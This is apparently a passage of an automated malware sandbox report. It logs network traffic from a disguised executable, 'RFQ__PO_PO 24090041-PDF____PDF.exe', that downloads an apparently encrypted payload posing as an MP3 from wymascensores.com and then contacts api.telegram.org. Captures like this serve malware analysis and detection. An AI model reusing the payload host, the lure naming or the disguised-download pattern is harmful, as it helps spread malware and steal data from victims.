                                          Oct 4, 2024 06:22:25.578401089 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.578510046 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.578548908 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.578577995 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.578618050 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.578649998 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.578715086 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.578799009 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.578833103 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.578908920 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.578938961 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.579015017 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.579102039 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.579185009 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.579282999 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.579370022 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.579507113 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.579580069 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.579638958 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.579709053 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.583368063 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.583447933 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.583455086 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.583487034 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.583523035 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.583544016 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.583627939 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.583792925 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.583837986 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.583889961 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.583949089 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.583949089 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.583973885 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.584001064 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.584063053 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.600713015 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.600789070 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.600799084 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.600831032 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.600846052 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.600867033 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.600940943 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.667347908 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.667520046 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.667546988 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.667577028 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.667607069 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.667634964 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.667697906 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.667907000 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.667913914 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.667974949 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.668020010 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.668039083 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.668118000 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.668133974 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.668170929 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.668240070 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.668253899 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.668324947 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.668401003 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.668411970 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.668580055 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.668646097 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.668658018 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.668729067 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.668803930 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.668814898 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.668868065 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.668946981 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.668958902 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.668983936 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.669054985 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.669065952 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.669095039 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.669167995 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.669178009 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.669202089 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.669289112 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.669298887 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.695959091 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.695986986 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.703428984 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.703596115 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.703655958 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.703758001 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.774584055 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.774764061 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.774837017 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.774913073 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.774949074 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.775130987 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.775191069 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.775252104 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.775285959 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.775305033 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.775333881 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.775356054 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.775362015 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.775423050 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.775427103 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.775489092 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.775607109 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.775681019 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.775719881 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.775794029 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.775846004 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.775918007 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.775949001 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.776026964 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.776093006 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.776166916 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.776259899 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.776360989 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.776379108 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.776465893 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.776510954 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.776593924 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.779337883 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.779599905 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.797466040 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.797652006 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.797713995 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.797796011 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.862173080 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.862349033 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.862407923 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.862481117 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.862525940 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.862548113 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.862579107 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.862605095 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.862827063 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.862903118 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.863034964 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.863115072 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.863164902 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.863244057 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.863430023 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.863506079 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.863563061 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.863635063 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.863816977 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.863894939 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.863960981 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.864028931 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.864121914 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.864201069 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.864252090 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.864324093 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.864373922 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.864447117 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.864495039 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.864506960 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.864506960 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.864527941 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.864562035 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.864562035 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.864588022 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.864588022 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.864588022 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.864617109 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.864665031 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.864665031 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.864718914 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.864738941 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.885046005 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.885214090 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.885272980 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.885355949 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.949779987 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.949951887 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.950011969 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.950073004 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.950103998 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.950119019 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.950145960 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.950145960 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.950202942 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.950216055 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.950280905 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.950300932 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.950330019 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.950365067 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.950464010 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.950504065 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.950515032 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.950545073 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.950586081 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.950658083 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.950670004 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.950701952 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.950726032 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.950742006 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.950767040 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.950805902 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.950805902 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.950831890 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.950882912 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.950922012 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.951299906 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.951381922 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.951432943 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.951570988 CEST4434974067.212.175.162192.168.2.4
                                          Oct 4, 2024 06:22:25.953511000 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.959753036 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.959968090 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:25.991954088 CEST49740443192.168.2.467.212.175.162
                                          Oct 4, 2024 06:22:27.628715038 CEST49741443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:27.628817081 CEST44349741149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:27.629590034 CEST49741443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:27.632667065 CEST49741443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:27.632705927 CEST44349741149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:28.266967058 CEST44349741149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:28.267072916 CEST49741443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:28.268646955 CEST49741443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:28.268671036 CEST44349741149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:28.269442081 CEST44349741149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:28.312129974 CEST49741443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:28.667984962 CEST49741443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:28.711481094 CEST44349741149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:28.844269037 CEST44349741149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:28.844542980 CEST49741443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:28.844580889 CEST44349741149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:29.093590021 CEST44349741149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:29.093746901 CEST44349741149.154.167.220192.168.2.4
                                          Oct 4, 2024 06:22:29.093847036 CEST49741443192.168.2.4149.154.167.220
                                          Oct 4, 2024 06:22:29.094441891 CEST49741443192.168.2.4149.154.167.220

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 4, 2024 06:22:03.151809931 CEST5105953192.168.2.41.1.1.1
                                          Oct 4, 2024 06:22:03.376835108 CEST53510591.1.1.1192.168.2.4
                                          Oct 4, 2024 06:22:06.500963926 CEST6151553192.168.2.41.1.1.1
                                          Oct 4, 2024 06:22:06.507627964 CEST53615151.1.1.1192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Oct 4, 2024 06:22:03.151809931 CEST192.168.2.41.1.1.10x67b7Standard query (0)wymascensores.comA (IP address)IN (0x0001)false
                                          Oct 4, 2024 06:22:06.500963926 CEST192.168.2.41.1.1.10x9ce7Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Oct 4, 2024 06:22:03.376835108 CEST1.1.1.1192.168.2.40x67b7No error (0)wymascensores.com67.212.175.162A (IP address)IN (0x0001)false
                                          Oct 4, 2024 06:22:06.507627964 CEST1.1.1.1192.168.2.40x9ce7No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • wymascensores.com
                                          • api.telegram.org

                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.44973067.212.175.1624436204C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-04 04:22:03 UTC84OUTGET /rigasin/Chody.mp3 HTTP/1.1
                                          Host: wymascensores.com
                                          Connection: Keep-Alive
                                          2024-10-04 04:22:04 UTC209INHTTP/1.1 200 OK
                                          Date: Fri, 04 Oct 2024 04:22:04 GMT
                                          Server: Apache
                                          Last-Modified: Thu, 03 Oct 2024 06:29:50 GMT
                                          Accept-Ranges: bytes
                                          Content-Length: 960520
                                          Connection: close
                                          Content-Type: audio/mpeg
                                          2024-10-04 04:22:04 UTC7983INData Raw: 14 1e 1b 18 84 68 0a 32 47 98 96 7b fc 60 fd 01 8b 18 c6 21 e4 e8 12 d9 8a ee ac 02 45 a1 c1 ef 40 05 9a d6 79 68 6a 91 bd 1d f7 4a ca eb 37 21 16 8e 61 d0 c5 23 4b b3 98 33 20 bd 18 07 3c c1 30 3d f0 c6 cc ce 29 b8 8d 98 f9 2e 3e 4d b3 02 a7 76 19 59 01 db 3f d0 0c f5 ce c8 e6 ea c4 cc 03 37 0b 71 7e ec 53 af ed 89 c2 71 f8 ec 97 c6 12 02 3c 33 e4 d2 ae 54 f4 47 e9 3a fa 79 4e 37 b3 0e 19 e7 b9 62 69 1b 2e 19 ce 83 a1 ab c2 c0 f4 ee 2a 0d a8 3c 9d 41 33 8f c2 32 af 34 c5 a5 bd 1c a4 c3 a3 71 79 c0 12 4f 3d ba d7 11 3c 91 b4 28 d7 67 18 59 f9 c9 c2 b4 38 7c 2c 65 22 8e 22 1e 27 9b db fd d5 47 46 38 a7 67 f1 24 36 1b cc a1 b8 b9 c0 18 50 81 28 26 53 6b b0 0f cf 2a 16 47 5c 67 b4 57 45 f8 93 c7 44 62 1a 2e 3e 85 32 48 f4 9a ee bc e1 47 e5 da 3b be ab 55 ff
                                          Data Ascii: h2G{`!E@yhjJ7!a#K3 <0=).>MvY?7q~Sq<3TG:yN7bi.*<A324qyO=<(gY8|,e""'GF8g$6P(&Sk*G\gWEDb.>2HG;U
                                          2024-10-04 04:22:04 UTC8000INData Raw: 86 9b be 33 e5 4f d0 9c 08 49 37 1b 67 ce 55 5d e1 61 36 7c dd fc da e5 99 0d c6 5f eb 1b f9 b7 33 3c 83 ad 8f 34 60 f5 93 75 c3 68 9a fc a4 89 79 67 c1 f8 aa ef 45 91 e2 a5 fc 10 12 b3 5a a6 9e 90 26 b5 36 3a 33 95 82 f6 6a 25 ea 0c eb 79 3c 3d 10 5a 5d 8f 92 b5 b8 50 60 a9 10 0d 01 aa ca 65 a9 01 73 44 a1 71 e1 2c 0d 05 54 29 47 d6 e0 b9 d0 fa da c3 b0 56 e5 10 45 59 ef 30 75 b0 ca 90 42 58 5f 2f 73 e5 3a a4 20 1c 60 b4 31 a3 45 83 7c 3f 3a ce a5 97 4a 93 70 f4 e1 16 38 97 a4 9e 20 30 4a fd 24 60 7f 10 83 40 7c d7 3a 2c b5 06 c6 8b a4 db b5 81 28 d4 84 1f 57 9f c5 a5 04 cd af 8b 2e 1a b5 ae b1 59 b6 e8 fb e0 88 3d 5b 01 67 3b 0c 03 ac b1 80 ee 06 42 1e 26 d4 5f a2 0c 12 41 46 0e 3e 77 9f 0c ab 04 83 2d 96 79 c1 70 e9 99 7b 04 2e 0f ee 05 e7 ef 5c ea af
                                          Data Ascii: 3OI7gU]a6|_3<4`uhygEZ&6:3j%y<=Z]P`esDq,T)GVEY0uBX_/s: `1E|?:Jp8 0J$`@|:,(W.Y=[g;B&_AF>w-yp{.\
                                          2024-10-04 04:22:04 UTC8000INData Raw: d6 14 66 2f f0 a4 81 2e e4 91 47 96 05 71 44 57 1d 8e 3d 1b 2a 66 08 68 1b 9b 9c 6b 6b 47 b7 ea 11 16 fa 33 f8 07 69 d1 3f 51 43 28 d8 de bb 54 9a c5 cd ca 63 62 72 4d 13 32 a2 c9 61 cb 54 42 21 a0 3a a5 9b 55 6a a5 40 d6 15 a7 fc 9f 45 d9 45 5b 7f 54 06 00 e1 51 9d 54 8e e3 45 45 03 3d 14 0f 16 e1 25 59 48 a1 c4 18 b3 b8 ff 70 5a 7b a9 46 73 1a b6 ef 58 4c 27 03 a1 eb 85 0a 4a 6b 58 81 ff e5 53 7b cf 62 dc 33 2a 78 b2 2a 1c 72 e1 f6 37 c9 42 2e 02 7c 20 93 7b 2b 5f 06 16 18 db b2 dc 9d bb a2 69 40 3e 64 41 81 00 aa 75 77 65 04 94 eb 90 aa 83 7f 2a 93 a5 84 5e a3 be 69 f0 f6 f8 ad b6 4f 26 5a 62 98 2a f2 23 3b bb 88 a8 fb 71 fb a5 49 ca 9d a6 c9 c6 dc a2 3b 90 81 a2 e0 75 d8 97 1f 7c 55 22 a5 73 ad 8b 12 2a 63 57 46 1a 34 1a bd 71 03 fb be d3 1b 78 92 58
                                          Data Ascii: f/.GqDW=*fhkkG3i?QC(TcbrM2aTB!:Uj@EE[TQTEE=%YHpZ{FsXL'JkXS{b3*x*r7B.| {+_i@>dAuwe*^iO&Zb*#;qI;u|U"s*cWF4qxX
                                          2024-10-04 04:22:04 UTC8000INData Raw: bd 19 ec f6 16 a0 5b f2 16 bd 32 49 a6 0b 90 5d e5 fc c0 c9 7c 43 1a 7b 93 79 9b 5e 25 cc 93 88 54 9c 33 69 0a 36 a6 b0 fe 92 70 4d 70 7c bc 49 5d 71 df 56 55 b0 42 bf fc 57 b0 26 11 61 16 d4 00 5e 6a 79 fd e6 3f 73 90 66 3a 32 e5 4f 80 13 08 97 6c 71 90 d0 70 e0 2e ee 2d 0e 2d 8f 2b 01 d4 01 63 6d 52 89 c0 50 12 ec b9 62 08 22 bf 3d 66 ad 56 ad 94 69 49 33 09 cb ac e3 44 27 14 21 5e b2 d0 18 09 2b e6 39 c9 f6 c6 d5 c3 22 81 bd c8 db ad 00 27 73 9a c6 2a a4 d8 64 7f 6c da 04 c6 69 33 f5 f4 50 c6 21 07 19 18 dc 52 b7 f2 a6 48 ba 68 a4 e5 84 5c be 86 14 eb d6 ff d9 6e 1b 6f 93 4f f9 8a ff ac f7 38 01 eb ac 2a e3 f7 fa 63 a0 67 4f 05 2a c9 83 58 01 b2 88 d4 67 e8 33 d0 68 78 f3 19 e6 95 0d 78 fe b4 93 c9 ac 13 49 0a 97 88 9c 9e 27 95 e2 1c 6c d8 78 98 5d 91
                                          Data Ascii: [2I]|C{y^%T3i6pMp|I]qVUBW&a^jy?sf:2Olqp.--+cmRPb"=fViI3D'!^+9"'s*dli3P!RHh\noO8*cgO*Xg3hxxI'lx]
                                          2024-10-04 04:22:04 UTC8000INData Raw: 39 cf 98 34 49 f0 56 e8 ae c9 1d 87 8d 3f 93 7c 5b dc cf bf ee 5c 48 37 66 78 5d 23 5d 91 41 b0 b8 9f 79 4a ed a9 0b 90 8d 0d fd 04 5b a0 2e ae 7c 81 21 fc d1 57 f5 b9 d5 54 d2 eb 21 67 b1 a4 6d d8 b2 21 e4 49 3b 0a 7e f0 0e 51 e9 0e 2a b0 38 63 30 b5 72 57 e3 ad 11 69 75 e3 8f da 7b 84 0f d4 76 c0 fe 26 af ff 14 2a a5 ce 0a 06 e1 e7 15 27 8f 95 4f b7 7f 4b 04 c0 a9 4b ef 69 4c 19 8f 03 23 b1 c1 fe 58 07 93 03 65 7e 63 e3 1f ef b5 18 5c c6 c4 84 bf b4 32 69 99 46 12 33 5f 62 35 c8 37 32 4a 28 11 0e 0e cc bd b5 4b b7 91 2e 8f 72 52 c6 dc d7 f7 e3 0a c6 e7 30 85 21 ab d1 c7 80 0d 7a 3e f3 fe b6 8d 5d 23 d9 a2 16 27 2c 32 c5 4d 82 1d e6 5b d4 4b ac 34 a4 5a 4b e5 11 47 bc 90 df f4 3a a5 08 0b 58 36 47 db 96 dd 5a be 5e 85 b3 15 78 6d 98 14 99 4e 37 74 56 15
                                          Data Ascii: 94IV?|[\H7fx]#]AyJ[.|!WT!gm!I;~Q*8c0rWiu{v&*'OKKiL#Xe~c\2iF3_b572J(K.rR0!z>]#',2M[K4ZKG:X6GZ^xmN7tV
